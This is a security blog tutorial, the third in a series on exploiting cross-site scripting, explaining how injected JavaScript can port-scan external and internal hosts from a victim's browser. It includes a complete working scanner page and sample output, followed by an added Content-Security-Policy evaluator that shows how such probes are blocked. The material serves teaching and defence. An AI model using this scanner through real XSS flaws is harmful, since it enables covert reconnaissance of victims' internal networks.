Security Community Blog

Getting Sassy With XSS Part III – Port Scanning

Created: 20 Aug 2012 • Updated: 11 Nov 2013
Vince Kornacki

In our last installment we examined the exploitation of cross-site scripting (XSS) to launch phishing attacks in order to steal application usernames and passwords. That was nifty. But what if you want to use the victim's workstation as a stepping stone to attack other systems? Is there anything left in our bag of tricks? You bet there is!
 
The "document.createElement()" DOM method allows JavaScript to create a new element node. The following JavaScript code therefore creates a new JavaScript object:
 
var newScript = document.createElement('script');
 
Now here comes the magic. We need to set the source of the "newScript" object. For example, a valid source script would look something like this:
 
newScript.src = 'http://www.application.com/scripts/valid.js'
 
However, we are not interested in some boring valid source script; we are interested in port scanning! So let's consider two distinct cases. The first case is an open port. For example, the following source script references a known open port:
 
newScript.src = 'http://www.google.com:80/'
 
This source script reference will connect to TCP port "80" on the server "www.google.com", and will therefore return data as the network connection is successful. However, the data will not be valid JavaScript so either the error message "Script error" or the error message "Error loading script" will be thrown. On the other hand, the following source script references a known closed port:
 
newScript.src = 'http://www.google.com:99/'
 
This source script reference will connect to TCP port "99" on the server "www.google.com" and will therefore not return data since the network connection is unsuccessful. Therefore no error message will be thrown. Are the gears turning? Do you smell what the Rock is cooking? The Rock smells a bowl of delicious port scan soup!
 
The "window.onerror" DOM object allows us to specify a function that will be automatically called whenever an error message is thrown:
 
window.onerror = handleError;
 
The "handleError" function will then test for the presence of the "Script error" or "Error loading script" error messages. If one of the error messages was thrown the port is open; otherwise the port is closed. And the beauty of this port scanner is that internal hosts can be scanned as well. That's right, the compromised workstation can be used a stepping stone to attack systems on the victim's internal network! But as always, do not take my word for it. Copy and paste the following content into a local file:
 
<html>
<body>
<script>
window.onerror = handleError;
function doPortscan()
{
  var host = document.formPortscan.host.value;
  var port = document.formPortscan.port.value;
  document.getElementById("divOutput").innerHTML += '<br />Scanning host "' + host + '" port "' + port + '"...';
  var newScript = document.createElement('script');
  newScript.src = 'http://' + host + ':' + port;
  document.body.appendChild(newScript);
}
function handleError(message, url, line)
{
  if(message.match(/Script error|Error loading script/))
  {
    document.getElementById("divOutput").innerHTML += "OPEN!";
  }
}
</script>
<form name="formPortscan" onsubmit="return false;">
<table>
<tr>
<td>Host:</td>
<td><input type="text" name="host"></td>
</tr>
<tr>
<td>Port:</td>
<td><input type="text" name="port"></td>
</tr>
<tr>
<td></td>
<td><input type="submit" value="Portscan" onclick="doPortscan();" /></td>
</tr>
</table>
</form>
<div id="divOutput"></div>
</body>
</html>
 
Enter the target "Host" and "Port" combination and click "Portscan" to get the party started! If the string "OPEN!" is returned the port is open:
 
Scanning host "www.google.com" port "80"...OPEN!
 
If the string "OPEN!" is not returned the port is closed:
 
Scanning host "www.google.com" port "99"...
 
The port scanner works like a charm for both external and internal systems! You want fries with that luscious port scanning sandwich? BAM!
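Now for the defender's side of this trick. The whole technique hinges on the browser being willing to fetch a dynamically created script element from an arbitrary "host:port". A Content-Security-Policy header on the vulnerable application with a restrictive "script-src" directive takes that away: the browser refuses the fetch before any TCP connection is attempted, so there is no "Error loading script" to observe and nothing for "window.onerror" to distinguish. The following is an added example, not code from the original post and not a browser's CSP implementation: a small evaluator for the "script-src" directive (with the "default-src" fallback) that decides whether a given script URL would be permitted under a given policy. It assumes the protected application lives at "http://www.application.com" (the origin the post uses for its valid script) and covers only the source expressions exercised in the walk-through ('self', 'none', a bare scheme such as "https:", and host expressions with an optional port and a leading "*." wildcard). The function names "scriptAllowed" and "probeBlocked" and the sample addresses are constructed for this example.

```javascript
// Added example (not from the original post): a minimal evaluator for the
// Content-Security-Policy "script-src" directive. It shows why a policy such
// as "script-src 'self'" prevents an injected <script src="http://host:port">
// from being fetched, so the onerror-based port inference never gets a signal.
// Illustrative only; it is not a browser's CSP implementation and handles just
// the source expressions used in the walk-through below.

function defaultPort(protocol) {
  // Default port for the schemes we care about; '' for anything else.
  if (protocol === 'https:') return '443';
  if (protocol === 'http:') return '80';
  return '';
}

function effectivePort(url) {
  // WHATWG URL drops a default port, so "http://host:80/" has url.port === ''.
  return url.port || defaultPort(url.protocol);
}

function parseScriptSources(policy) {
  // Return the source list governing scripts: "script-src" if present,
  // otherwise the "default-src" fallback, otherwise null (unrestricted).
  let fallback = null;
  for (const directive of policy.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (name === 'script-src') return tokens.slice(1);
    if (name === 'default-src') fallback = tokens.slice(1);
  }
  return fallback;
}

function matchesSource(expr, target, pageOrigin) {
  const t = new URL(target);
  const targetPort = effectivePort(t);

  if (expr === "'self'") {
    // Same scheme, host and port as the page that carries the policy.
    const p = new URL(pageOrigin);
    return p.protocol === t.protocol && p.hostname === t.hostname &&
           effectivePort(p) === targetPort;
  }
  // 'none', 'unsafe-inline', nonces and hashes never match a URL fetch.
  if (expr.startsWith("'")) return false;

  // scheme-source, e.g. "https:"
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) {
    return t.protocol.toLowerCase() === expr.toLowerCase();
  }

  // host-source: [scheme://]host[:port], where host may be "*" or "*.suffix"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^:/\s]+)(?::(\d+|\*))?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && scheme.toLowerCase() + ':' !== t.protocol.toLowerCase()) return false;
  const hostLower = host.toLowerCase();
  if (hostLower !== '*') {
    if (hostLower.startsWith('*.')) {
      // "*.example.com" matches "api.example.com" but not "example.com" itself.
      if (!t.hostname.endsWith(hostLower.slice(1))) return false;
    } else if (hostLower !== t.hostname) {
      return false;
    }
  }
  // No explicit port in the expression: only the scheme's default port matches,
  // which is exactly what rules out "http://192.168.1.1:8080"-style probes.
  if (!port) return targetPort === defaultPort(t.protocol);
  return port === '*' || port === targetPort;
}

function scriptAllowed(policy, scriptUrl, pageOrigin) {
  const sources = parseScriptSources(policy);
  if (sources === null) return true;          // no applicable directive
  return sources.some((expr) => matchesSource(expr, scriptUrl, pageOrigin));
}

function probeBlocked(policy, host, port, pageOrigin) {
  // The post's scanner builds its URL as 'http://' + host + ':' + port.
  return !scriptAllowed(policy, 'http://' + host + ':' + port, pageOrigin);
}

// Walk-through with the origin the post uses for its "valid" script
// (assumed here to be the application that carries the policy).
const PAGE_ORIGIN = 'http://www.application.com';
const POLICY = "default-src 'none'; script-src 'self'";
console.log(scriptAllowed(POLICY, 'http://www.application.com/scripts/valid.js', PAGE_ORIGIN)); // true
console.log(probeBlocked(POLICY, 'www.google.com', '80', PAGE_ORIGIN)); // true
console.log(probeBlocked(POLICY, 'www.google.com', '99', PAGE_ORIGIN)); // true: never reaches the network
```

Note that the policy does double duty: "script-src 'self'" without 'unsafe-inline' also refuses the reflected inline "<script>" block that carried the scanner into the page in the first place, and legitimate third-party scripts are re-admitted by listing their exact origin (for example "https://cdn.example.com"), which the evaluator shows still rejects the same host on a non-default port. The fix for the root cause remains proper output encoding of the reflected input; CSP is the layer that limits what an XSS can reach when that fails.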
